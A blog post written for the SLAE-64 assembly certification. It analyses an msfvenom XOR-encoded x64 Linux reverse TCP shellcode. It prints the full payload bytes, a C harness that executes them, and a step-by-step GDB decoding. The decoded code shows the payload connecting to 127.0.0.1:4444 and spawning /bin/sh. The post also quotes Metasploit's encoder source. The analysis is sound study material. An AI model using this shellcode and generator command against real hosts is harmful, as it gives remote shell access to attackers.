Tags: assembly, slae-64, shellcode
This and two other posts will make up the fifth of seven assignments that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.
This time around, I thought it would be interesting to use an encoder and see how msfvenom implemented it in assembly.
We’ll start this analysis out in the same way we’ve done for the previous two posts that can be found here and here.
/*
* msfvenom -p linux/x64/shell_reverse_tcp -e x64/xor -f c LHOST=127.0.0.1 LPORT=4444
*
* [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
* [-] No arch selected, selecting arch: x64 from the payload
* Found 1 compatible encoders
* Attempting to encode payload with 1 iterations of x64/xor
* x64/xor succeeded with size 119 (iteration=0)
* x64/xor chosen with final size 119
* Payload size: 119 bytes
* Final size of c file: 524 bytes
*/
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xcb\x58\xad\x94\xef\x3b\x06\x3c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa1\x71\xf5\x0d\x85\x39"
"\x59\x56\xca\x06\xa2\x91\xa7\xac\x4e\x85\xc9\x58\xbc\xc8\x90"
"\x3b\x06\x3d\x9a\x10\x24\x72\x85\x2b\x5c\x56\xe1\x00\xa2\x91"
"\x85\x38\x58\x74\x34\x96\xc7\xb5\xb7\x34\x03\x49\x3d\x32\x96"
"\xcc\x76\x73\xbd\x13\xa9\x31\xc3\xbb\x9c\x53\x06\x6f\x83\xd1"
"\x4a\xc6\xb8\x73\x8f\xda\xc4\x5d\xad\x94\xef\x3b\x06\x3c";
We then add the shellcode generated above to the skeleton.
// gcc -fno-stack-protector -z execstack -o shellcode-skeleton shellcode-skeleton.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xcb\x58\xad\x94\xef\x3b\x06\x3c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa1\x71\xf5\x0d\x85\x39"
"\x59\x56\xca\x06\xa2\x91\xa7\xac\x4e\x85\xc9\x58\xbc\xc8\x90"
"\x3b\x06\x3d\x9a\x10\x24\x72\x85\x2b\x5c\x56\xe1\x00\xa2\x91"
"\x85\x38\x58\x74\x34\x96\xc7\xb5\xb7\x34\x03\x49\x3d\x32\x96"
"\xcc\x76\x73\xbd\x13\xa9\x31\xc3\xbb\x9c\x53\x06\x6f\x83\xd1"
"\x4a\xc6\xb8\x73\x8f\xda\xc4\x5d\xad\x94\xef\x3b\x06\x3c";
int main() {
printf("Shellcode length: %zu\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Finally, we compile and run with GDB.
┌(epi@main)─(05:41 AM Thu Aug 05)
└─(assignment-five)─> gcc -o shellcode-skeleton shellcode-skeleton.c -fno-stack-protector -z execstack
┌(epi@main)─(05:41 AM Thu Aug 05)
└─(assignment-five)─> gdb ./shellcode-skeleton
While this is the disassembled code when we hit the first instruction of our shellcode, it has not been decoded yet. The highlighted lines below make up the what really amounts to the decoder stub.
10x0000555555755020 <+0>: xor rcx,rcx ; zero out rcx
20x0000555555755023 <+3>: sub rcx,0xfffffffffffffff6 ; add 10 to rcx
3; load address of shellcode (0x555555755020) using rip relative addressing
40x000055555575502a <+10>: lea rax,[rip+0xffffffffffffffef]
50x0000555555755031 <+17>: movabs rbx,0x3c063bef94ad58cb ; store 8-byte key in rbx to perform xor function
60x000055555575503b <+27>: xor QWORD PTR [rax+0x27],rbx ; xor this addr (shellcode + 27) with key in rbx
70x000055555575503f <+31>: sub rax,0xfffffffffffffff8 ; advance rax pointer 8 bytes
8; xor decoder loop (1st iteration shellcode + 27 + 0, 2nd shellcode + 27 + 8 ...)
90x0000555555755045 <+37>: loop 0x55555575503b <code+27>
10; 0x0000555555755047 <+39>: movabs eax,ds:0xca565939850df571
11; 0x0000555555755050 <+48>: (bad)
12; 0x0000555555755051 <+49>: movabs ds:0xbc58c9854eaca791,al
13; 0x000055555575505a <+58>: enter 0x3b90,0x6
14; 0x000055555575505e <+62>: cmp eax,0x7224109a
15; 0x0000555555755063 <+67>: test DWORD PTR [rbx],ebp
16; 0x0000555555755065 <+69>: pop rsp
17; 0x0000555555755066 <+70>: push rsi
18; 0x0000555555755067 <+71>: loope 0x555555755069 <code+73>
19; 0x0000555555755069 <+73>: movabs ds:0xc796347458388591,al
20; 0x0000555555755072 <+82>: mov ch,0xb7
21; 0x0000555555755074 <+84>: xor al,0x3
22; 0x0000555555755076 <+86>: rex.WB cmp rax,0x76cc9632
23; 0x000055555575507c <+92>: jae 0x55555575503b <code+27>
24; 0x000055555575507e <+94>: adc ebp,DWORD PTR [rcx-0x63443ccf]
25; 0x0000555555755084 <+100>: push rbx
26; 0x0000555555755085 <+101>: (bad)
27; 0x0000555555755086 <+102>: outs dx,DWORD PTR ds:[rsi]
28; 0x0000555555755087 <+103>: adc ecx,0x4a
29; 0x000055555575508a <+106>: (bad)
30; 0x000055555575508b <+107>: mov eax,0xc4da8f73
31; 0x0000555555755090 <+112>: pop rbp
32; 0x0000555555755091 <+113>: lods eax,DWORD PTR ds:[rsi]
33; 0x0000555555755092 <+114>: xchg esp,eax
34; 0x0000555555755093 <+115>: out dx,eax
35; 0x0000555555755094 <+116>: cmp eax,DWORD PTR [rsi]
36; 0x0000555555755096 <+118>: cmp al,0x0
Now we’ll take a look at each iteration of the decoder loop to see how the decoder changes the payload beneath it. The following is the disassembly after the very first xor operation was performed. Feel free to compare the snippets below with what they looked like before being decoded. Also, for the sake of brevity, we’ll analyze the instructions as we go.
; after 1st xor operation
0x0000555555755047 <+39>: push 0x29 ; push socket syscall # onto stack
0x0000555555755049 <+41>: pop rax ; and store it in rax
0x000055555575504a <+42>: cdq ; zero out rdx via sign extension
0x000055555575504b <+43>: push 0x2 ; push AF_INET onto the stack
0x000055555575504d <+45>: pop rdi ; and store it in rdi
; after 2nd xor operation
0x000055555575504e <+46>: push 0x1 ; push SOCK_STREAM onto the stack
0x0000555555755050 <+48>: pop rsi ; and store it in rsi
0x0000555555755051 <+49>: syscall ; socket syscall
0x0000555555755053 <+51>: xchg rdi,rax ; store file descriptor in rdi
; after 3rd xor operation
0x0000555555755055 <+53>: movabs rcx,0x100007f5c110002
; sockaddr_in struct
; sin_family -> AF_INET
; sin_port -> 4444
; sin_addr -> 127.0.0.1
; after 4th xor operation
0x000055555575505f <+63>: push rcx ; push sockaddr_in onto the stack
0x0000555555755060 <+64>: mov rsi,rsp ; store pointer in rsi
0x0000555555755063 <+67>: push 0x10 ; push 16 onto the stack (length of sockaddr_in)
0x0000555555755065 <+69>: pop rdx ; and store it in rdx
; after 5th xor operation
0x0000555555755066 <+70>: push 0x2a ; push connect syscall number onto the stack
0x0000555555755068 <+72>: pop rax ; and store it in rax
0x0000555555755069 <+73>: syscall ; connect syscall
0x000055555575506b <+75>: push 0x3 ; push 0x3 onto the stack
0x000055555575506d <+77>: pop rsi ; and store it in rsi
; after 6th xor operation
0x000055555575506e <+78>: dec rsi ; remove 1 from rsi
0x0000555555755071 <+81>: push 0x21 ; push dup2 syscall number onto the stack
0x0000555555755073 <+83>: pop rax ; and store it in rax
0x0000555555755074 <+84>: syscall ; dup2 syscall (rsi is 2 at this point, i.e. STDERR is dup'd)
; after 7th xor operation
; dup2 loop, STDIN and STDOUT left to be dup'd before moving on
0x0000555555755076 <+86>: jne 0x55555575506e <code+78>
0x0000555555755078 <+88>: push 0x3b ; push execve syscall onto the stack
0x000055555575507a <+90>: pop rax ; and store it in rax
0x000055555575507b <+91>: cdq ; zero out rdx via sign extension
; after 8th xor operation
0x000055555575507c <+92>: movabs rbx,0x68732f6e69622f ; store /bin/sh in rbx
0x0000555555755086 <+102>: push rbx ; push rbx onto the stack
; after 9th xor operation
0x0000555555755087 <+103>: mov rdi,rsp ; store pointer to /bin/sh in rdi
0x000055555575508a <+106>: push rdx ; push 0x0 onto the stack
0x000055555575508b <+107>: push rdi ; push pointer to /bin/sh onto the stack
0x000055555575508c <+108>: mov rsi,rsp ; and store it in rsi
; after 10th xor operation
0x000055555575508f <+111>: syscall ; execve syscall
0x0000555555755091 <+113>: add BYTE PTR [rax],al ; padding, the instruction's opcode is 0x00
0x0000555555755093 <+115>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755095 <+117>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755097 <+119>: add BYTE PTR [rax],al ; padding - 0x00
; gdb-peda$ x/7xb 0x555555755091
; 0x555555755091 <code+113>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Below is the complete decoded shellcode and stub together.
0x0000555555755020 <+0>: xor rcx,rcx ; zero out rcx
0x0000555555755023 <+3>: sub rcx,0xfffffffffffffff6 ; add 10 to rcx
0x000055555575502a <+10>: lea rax,[rip+0xffffffffffffffef] ; load address of shellcode
0x0000555555755031 <+17>: movabs rbx,0x3c063bef94ad58cb ; store 8-byte key in rbx to perform xor function
0x000055555575503b <+27>: xor QWORD PTR [rax+0x27],rbx ; xor this addr (shellcode + 27) with key in rbx
0x000055555575503f <+31>: sub rax,0xfffffffffffffff8 ; advance rax pointer 8 bytes
0x0000555555755045 <+37>: loop 0x55555575503b <code+27> ; xor decoder loop
0x0000555555755047 <+39>: push 0x29 ; push socket syscall # onto stack
0x0000555555755049 <+41>: pop rax ; and store it in rax
0x000055555575504a <+42>: cdq ; zero out rdx via sign extension
0x000055555575504b <+43>: push 0x2 ; push AF_INET onto the stack
0x000055555575504d <+45>: pop rdi ; and store it in rdi
0x000055555575504e <+46>: push 0x1 ; push SOCK_STREAM onto the stack
0x0000555555755050 <+48>: pop rsi ; and store it in rsi
0x0000555555755051 <+49>: syscall ; socket syscall
0x0000555555755053 <+51>: xchg rdi,rax ; store file descriptor in rdi
0x0000555555755055 <+53>: movabs rcx,0x100007f5c110002 ; sockaddr_in struct
0x000055555575505f <+63>: push rcx ; push sockaddr_in onto the stack
0x0000555555755060 <+64>: mov rsi,rsp ; store pointer in rsi
0x0000555555755063 <+67>: push 0x10 ; push 16 onto the stack (length of sockaddr_in)
0x0000555555755065 <+69>: pop rdx ; and store it in rdx
0x0000555555755066 <+70>: push 0x2a ; push connect syscall number onto the stack
0x0000555555755068 <+72>: pop rax ; and store it in rax
0x0000555555755069 <+73>: syscall ; connect syscall
0x000055555575506b <+75>: push 0x3 ; push 0x3 onto the stack
0x000055555575506d <+77>: pop rsi ; and store it in rsi
0x000055555575506e <+78>: dec rsi ; remove 1 from rsi
0x0000555555755071 <+81>: push 0x21 ; push dup2 syscall number onto the stack
0x0000555555755073 <+83>: pop rax ; and store it in rax
0x0000555555755074 <+84>: syscall ; dup2 syscall
0x0000555555755076 <+86>: jne 0x55555575506e <code+78> ; dup2 loop
0x0000555555755078 <+88>: push 0x3b ; push execve syscall onto the stack
0x000055555575507a <+90>: pop rax ; and store it in rax
0x000055555575507b <+91>: cdq ; zero out rdx via sign extension
0x000055555575507c <+92>: movabs rbx,0x68732f6e69622f ; store /bin/sh in rbx
0x0000555555755086 <+102>: push rbx ; push rbx onto the stack
0x0000555555755087 <+103>: mov rdi,rsp ; store pointer to /bin/sh in rdi
0x000055555575508a <+106>: push rdx ; push 0x0 onto the stack
0x000055555575508b <+107>: push rdi ; push pointer to /bin/sh onto the stack
0x000055555575508c <+108>: mov rsi,rsp ; and store it in rsi
0x000055555575508f <+111>: syscall ; execve syscall
0x0000555555755091 <+113>: add BYTE PTR [rax],al ; padding, the instruction's opcode is 0x00
0x0000555555755093 <+115>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755095 <+117>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755097 <+119>: add BYTE PTR [rax],al ; padding - 0x00
After stepping through the assembly in GDB, I wanted to confirm my work by looking at the source code for the encoder. It’s written in ruby, but even if you don’t have any ruby experience (I have next to none) it’s pretty easy to understand.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Encoder::Xor
def initialize
super(
'Name' => 'XOR Encoder',
'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.',
'Author' => [ 'sf' ],
'Arch' => ARCH_X64,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 8,
'KeyPack' => 'Q',
'BlockSize' => 8,
}
)
end
# Indicate that this module can preserve some registers
# ...which is currently not true. This is a temp fix
# until the full preserve_registers functionality is
# implemented.
def can_preserve_registers?
true
end
def decoder_stub( state )
# calculate the (negative) block count . We should check this against state.badchars.
block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
decoder = "\x48\x31\xC9" + # xor rcx, rcx
"\x48\x81\xE9" + block_count + # sub ecx, block_count
"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
"\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????
"\x48\x31\x58\x27" + # xor [rax+0x27], rbx
"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
"\xE2\xF4" # loop 0x1B
state.decoder_key_offset = decoder.index( 'XXXXXXXX' )
return decoder
end
end